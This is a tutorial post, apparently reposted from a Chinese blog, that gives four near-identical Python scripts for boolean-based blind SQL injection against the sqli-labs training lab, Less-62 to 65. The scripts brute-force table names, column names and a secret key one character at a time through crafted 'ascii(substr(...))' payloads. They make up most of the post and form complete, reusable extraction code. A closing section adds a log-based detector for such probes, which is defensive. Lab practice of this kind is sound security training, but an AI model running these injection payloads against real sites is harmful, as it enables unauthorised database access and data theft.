sqli-labs (Less62-65) boolean-based blind injection scripts
2022/2/7 2:12:57
This article presents boolean-based blind injection scripts for sqli-labs Less62-65; they have some reference value for programmers working through the lab, so those who need them can follow along with the editor.
- Preface
- Less-62
- Less-63
- Less-64
- Less-65
Preface

Before running, install the requests and lxml packages, change the values of the url and referer parameters, set $times= 13000 in index.php (the lab's request limit), and reset the challenges database.
Less-62
```python
import requests
from lxml import etree

"""
Less-62 boolean-based blind brute-force script
Change $times= 13000 in the source, reset the challenges database, then run the
program; pip install the packages first if they are missing.
Principle: for each payload, loop over the character dictionary and decide the
correct character from the response (whether the cyan hint element appears).
"""

url = 'http://192.168.31.242/sqli-labs/Less-62/'
headers = {'referer': 'http://192.168.31.242/sqli-labs/Less-62/',
           'cookie': 'challenge=123; PHPSESSID=dc2akh4kagv4jqvc1f78'}
payload_key = "?id="
# candidate characters: a-z _ , A-Z 0-9
list_range = list(range(97, 123)) + [95] + [44] + list(range(65, 91)) + list(range(48, 58))
request_times = 0

alltb_payload = """') or (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="{}"),{},1)))={}%23"""
allcol_payload = """') or ascii(substr((select group_concat(column_name)from information_schema.columns where table_schema="{}" and table_name="{}" ),{},1))={}%23"""
allvalue_payload = """') or ascii(substr((select group_concat({})from {}.{}),{},1))={}%23"""


def same(payload, *params):
    """Recover one string character by character using the boolean oracle."""
    global request_times
    oneword_index = 1
    tb_word = ""
    while True:
        for i in list_range:
            # group_concat() folds all names into one row, so one loop recovers them all
            payload3 = payload_key + payload.format(*params, oneword_index, i)
            a = requests.get(url + payload3, headers=headers)
            request_times += 1
            html = etree.HTML(a.text)
            # the lab renders a cyan <font> hint only when the injected condition is true
            tip = html.xpath("//font[@color='#00FFFF']/text()")
            if len(tip) != 0:
                oneword = chr(i)
                tb_word += oneword
                break
        else:
            # no candidate matched at this position: the string is complete
            break
        oneword_index += 1
    return tb_word


def main():
    sel_db = 'challenges'
    all_tb = same(alltb_payload, sel_db)
    print(sel_db + "库里的表:" + all_tb)
    print('-' * 100)
    sel_tb = all_tb
    all_col = same(allcol_payload, sel_db, sel_tb)
    print(sel_tb + '表里的字段:' + all_col)
    print('-' * 100)
    key = all_col.split(',')[2]
    sel_col = key
    all_values = same(allvalue_payload, sel_col, sel_db, sel_tb)
    print(sel_col + '的值:' + all_values)
    print('-' * 100)
    print('一共请求了' + str(request_times) + '次')


if __name__ == '__main__':
    main()
```
Less-63
```python
import requests
from lxml import etree

"""
Less-63 boolean-based blind brute-force script
Change $times= 13000 in the source, reset the challenges database, then run the
program; pip install the packages first if they are missing.
Principle: for each payload, loop over the character dictionary and decide the
correct character from the response (whether the cyan hint element appears).
"""

url = 'http://192.168.31.242/sqli-labs/Less-63/'
headers = {'referer': 'http://192.168.31.242/sqli-labs/Less-63/',
           'cookie': 'challenge=123; PHPSESSID=dc2akh4kagv4jqvc1f78'}
payload_key = "?id="
# candidate characters: a-z _ , A-Z 0-9
list_range = list(range(97, 123)) + [95] + [44] + list(range(65, 91)) + list(range(48, 58))
request_times = 0

alltb_payload = """' or (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="{}"),{},1)))={}%23"""
allcol_payload = """' or ascii(substr((select group_concat(column_name)from information_schema.columns where table_schema="{}" and table_name="{}" ),{},1))={}%23"""
allvalue_payload = """' or ascii(substr((select group_concat({})from {}.{}),{},1))={}%23"""


def same(payload, *params):
    """Recover one string character by character using the boolean oracle."""
    global request_times
    oneword_index = 1
    tb_word = ""
    while True:
        for i in list_range:
            # group_concat() folds all names into one row, so one loop recovers them all
            payload3 = payload_key + payload.format(*params, oneword_index, i)
            a = requests.get(url + payload3, headers=headers)
            request_times += 1
            html = etree.HTML(a.text)
            # the lab renders a cyan <font> hint only when the injected condition is true
            tip = html.xpath("//font[@color='#00FFFF']/text()")
            if len(tip) != 0:
                oneword = chr(i)
                tb_word += oneword
                break
        else:
            # no candidate matched at this position: the string is complete
            break
        oneword_index += 1
    return tb_word


def main():
    sel_db = 'challenges'
    all_tb = same(alltb_payload, sel_db)
    print(sel_db + "库里的表:" + all_tb)
    print('-' * 100)
    sel_tb = all_tb
    all_col = same(allcol_payload, sel_db, sel_tb)
    print(sel_tb + '表里的字段:' + all_col)
    print('-' * 100)
    key = all_col.split(',')[2]
    sel_col = key
    all_values = same(allvalue_payload, sel_col, sel_db, sel_tb)
    print(sel_col + '的值:' + all_values)
    print('-' * 100)
    print('一共请求了' + str(request_times) + '次')


if __name__ == '__main__':
    main()
```
Less-64
```python
import requests
from lxml import etree

"""
Less-64 boolean-based blind brute-force script
Change $times= 13000 in the source, reset the challenges database, then run the
program; pip install the packages first if they are missing.
Principle: for each payload, loop over the character dictionary and decide the
correct character from the response (whether the cyan hint element appears).
"""

url = 'http://192.168.31.242/sqli-labs/Less-64/'
headers = {'referer': 'http://192.168.31.242/sqli-labs/Less-64/',
           'cookie': 'challenge=123; PHPSESSID=dc2akh4kagv4jqvc1f78'}
payload_key = "?id="
# candidate characters: a-z _ , A-Z 0-9
list_range = list(range(97, 123)) + [95] + [44] + list(range(65, 91)) + list(range(48, 58))
request_times = 0

alltb_payload = """1)) and (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="{}"),{},1)))={}%23"""
allcol_payload = """1)) and ascii(substr((select group_concat(column_name)from information_schema.columns where table_schema="{}" and table_name="{}" ),{},1))={}%23"""
allvalue_payload = """1)) and ascii(substr((select group_concat({})from {}.{}),{},1))={}%23"""


def same(payload, *params):
    """Recover one string character by character using the boolean oracle."""
    global request_times
    oneword_index = 1
    tb_word = ""
    while True:
        for i in list_range:
            # group_concat() folds all names into one row, so one loop recovers them all
            payload3 = payload_key + payload.format(*params, oneword_index, i)
            a = requests.get(url + payload3, headers=headers)
            request_times += 1
            html = etree.HTML(a.text)
            # the lab renders a cyan <font> hint only when the injected condition is true
            tip = html.xpath("//font[@color='#00FFFF']/text()")
            if len(tip) != 0:
                oneword = chr(i)
                tb_word += oneword
                break
        else:
            # no candidate matched at this position: the string is complete
            break
        oneword_index += 1
    return tb_word


def main():
    sel_db = 'challenges'
    all_tb = same(alltb_payload, sel_db)
    print(sel_db + "库里的表:" + all_tb)
    print('-' * 100)
    sel_tb = all_tb
    all_col = same(allcol_payload, sel_db, sel_tb)
    print(sel_tb + '表里的字段:' + all_col)
    print('-' * 100)
    key = all_col.split(',')[2]
    sel_col = key
    all_values = same(allvalue_payload, sel_col, sel_db, sel_tb)
    print(sel_col + '的值:' + all_values)
    print('-' * 100)
    print('一共请求了' + str(request_times) + '次')


if __name__ == '__main__':
    main()
```
Less-65
```python
import requests
from lxml import etree

"""
Less-65 boolean-based blind brute-force script
Change $times= 13000 in the source, reset the challenges database, then run the
program; pip install the packages first if they are missing.
Principle: for each payload, loop over the character dictionary and decide the
correct character from the response (whether the cyan hint element appears).
"""

url = 'http://192.168.31.242/sqli-labs/Less-65/'
headers = {'referer': 'http://192.168.31.242/sqli-labs/Less-65/',
           'cookie': 'challenge=123; PHPSESSID=dc2akh4kagv4jqvc1f78'}
payload_key = "?id="
# candidate characters: a-z _ , A-Z 0-9
list_range = list(range(97, 123)) + [95] + [44] + list(range(65, 91)) + list(range(48, 58))
request_times = 0

alltb_payload = """1") and (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="{}"),{},1)))={}%23"""
allcol_payload = """1") and ascii(substr((select group_concat(column_name)from information_schema.columns where table_schema="{}" and table_name="{}" ),{},1))={}%23"""
allvalue_payload = """1") and ascii(substr((select group_concat({})from {}.{}),{},1))={}%23"""


def same(payload, *params):
    """Recover one string character by character using the boolean oracle."""
    global request_times
    oneword_index = 1
    tb_word = ""
    while True:
        for i in list_range:
            # group_concat() folds all names into one row, so one loop recovers them all
            payload3 = payload_key + payload.format(*params, oneword_index, i)
            a = requests.get(url + payload3, headers=headers)
            request_times += 1
            html = etree.HTML(a.text)
            # the lab renders a cyan <font> hint only when the injected condition is true
            tip = html.xpath("//font[@color='#00FFFF']/text()")
            if len(tip) != 0:
                oneword = chr(i)
                tb_word += oneword
                break
        else:
            # no candidate matched at this position: the string is complete
            break
        oneword_index += 1
    return tb_word


def main():
    sel_db = 'challenges'
    all_tb = same(alltb_payload, sel_db)
    print(sel_db + "库里的表:" + all_tb)
    print('-' * 100)
    sel_tb = all_tb
    all_col = same(allcol_payload, sel_db, sel_tb)
    print(sel_tb + '表里的字段:' + all_col)
    print('-' * 100)
    key = all_col.split(',')[2]
    sel_col = key
    all_values = same(allvalue_payload, sel_col, sel_db, sel_tb)
    print(sel_col + '的值:' + all_values)
    print('-' * 100)
    print('一共请求了' + str(request_times) + '次')


if __name__ == '__main__':
    main()
```
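Seen from the server side, all four scripts leave the same trail: one client sends a long run of requests to a single path whose id parameter carries ascii(substr(...,N,1))=M, and the responses come in exactly two sizes (hint shown or not). The detector below is an added example, not part of the original post: it parses constructed Apache combined-format log lines modelled on the Less-62 probes (client IPs, response sizes and user agent are assumed), groups the probes per client and path, and reconstructs the characters the oracle confirmed so an incident responder can judge what leaked.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote_plus

def _line(ip, pos, code, size):
    # One constructed Apache combined-log line shaped like a probe from the
    # Less-62 script above (requests percent-encodes spaces and double quotes).
    q = ("')%20or%20(ascii(substr((select%20group_concat(table_name)%20from%20"
         f"information_schema.tables%20where%20table_schema=%22challenges%22),{pos},1)))={code}%23")
    return (f'{ip} - - [07/Feb/2022:02:10:01 +0800] "GET /sqli-labs/Less-62/?id={q} HTTP/1.1" '
            f'200 {size} "http://192.168.31.242/sqli-labs/Less-62/" "python-requests/2.27.1"')

# Constructed sample: a wrong guess returns the 1421-byte page, a hit adds the cyan hint (1502 bytes).
SAMPLE_LOG = "\n".join([
    _line("10.0.0.5", 1, 97, 1421), _line("10.0.0.5", 1, 98, 1421),
    _line("10.0.0.5", 1, 99, 1502),   # chr(99) = 'c' confirmed at position 1
    _line("10.0.0.5", 2, 97, 1421), _line("10.0.0.5", 2, 104, 1502),  # chr(104) = 'h' at position 2
    '10.0.0.9 - - [07/Feb/2022:02:10:03 +0800] "GET /sqli-labs/Less-62/?id=1 HTTP/1.1" 200 1380 "-" "Mozilla/5.0"',
])

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" \d{3} (?P<size>\d+)')
# ascii(substr(<anything>,<pos>,1))=<code> is the per-character oracle shared by all four scripts
PROBE_RE = re.compile(r'ascii\s*\(\s*substr\s*\(.*,\s*(?P<pos>\d+)\s*,\s*1\s*\)+\s*=\s*(?P<code>\d+)', re.I)

def parse_probe(target):
    """Return (path, position, ascii_code) for a char-probe request target, else None."""
    path, _, query = target.partition('?')
    m = PROBE_RE.search(unquote_plus(query))
    return (path, int(m.group('pos')), int(m.group('code'))) if m else None

def detect(log_text, min_probes=3):
    """Group probes by (client IP, path) and report groups with >= min_probes.
    Most probes are misses, so the most common response size is the false branch;
    probes with any other size are confirmed characters, joined in position order."""
    groups = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        probe = parse_probe(m.group('target')) if m else None
        if probe:
            path, pos, code = probe
            groups[(m.group('ip'), path)].append((pos, code, int(m.group('size'))))
    findings = {}
    for key, probes in groups.items():
        if len(probes) < min_probes:
            continue
        false_size = Counter(s for _, _, s in probes).most_common(1)[0][0]
        hits = sorted((p, c) for p, c, s in probes if s != false_size)
        findings[key] = {'probes': len(probes), 'leaked': ''.join(chr(c) for _, c in hits)}
    return findings
```

The reconstruction heuristic assumes each position needs several misses before the hit, which holds for the dictionary walk these scripts perform but not for a binary-search extractor, where sizes would split evenly.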
That concludes this article on the sqli-labs (Less62-65) boolean-based blind injection scripts; we hope the articles we recommend are helpful, and we hope you will keep supporting 为之网!